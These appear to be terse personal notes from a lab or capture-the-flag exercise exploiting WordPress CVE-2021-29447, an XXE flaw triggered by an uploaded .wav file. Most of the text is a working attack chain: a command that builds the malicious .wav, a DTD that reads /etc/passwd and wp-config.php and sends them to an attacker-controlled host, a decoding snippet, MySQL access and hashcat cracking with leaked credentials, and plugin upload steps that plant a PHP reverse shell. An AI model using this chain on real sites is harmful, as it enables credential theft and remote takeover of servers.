Wordpress CVE-2021-29447

wordpress running in php 8, upload .wav file patched in wp 5.7.1

php://filter/zlib.inflate/resource=test.deflated

• .wav file echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.17.14.169:8000/evil.dtd'"'"'>%remote;]>\x00' > payload.wav • evil.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.17.14.169:8000/?a=%file;'>"> %eval; %exfiltrate; OR <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.17.14.169:8000/?a=%file;'>"> %eval; %exfiltrate; • decode zlib <?php echo zlib_decode(base64_decode('...')); ?> thedarktangent:[redacted] mysql -h 10.10.96.36 -P 3306 -u thedarktangent -p[redacted] hashcat.bin -m 400 -a0 user.hash rockyou.txt - wp users corp-001:[redacted] test-corp:[redacted] • creating vulnerable wordpress plugin in zip format 1. 2 files required - php-reverse-shell and plugin info [both php files] 2. zip and upload them [zip wp file1 file2] 3. Access php-reverse-shell on URL - <IP>/wp-content/plugins/wp/php-reverse-shell.php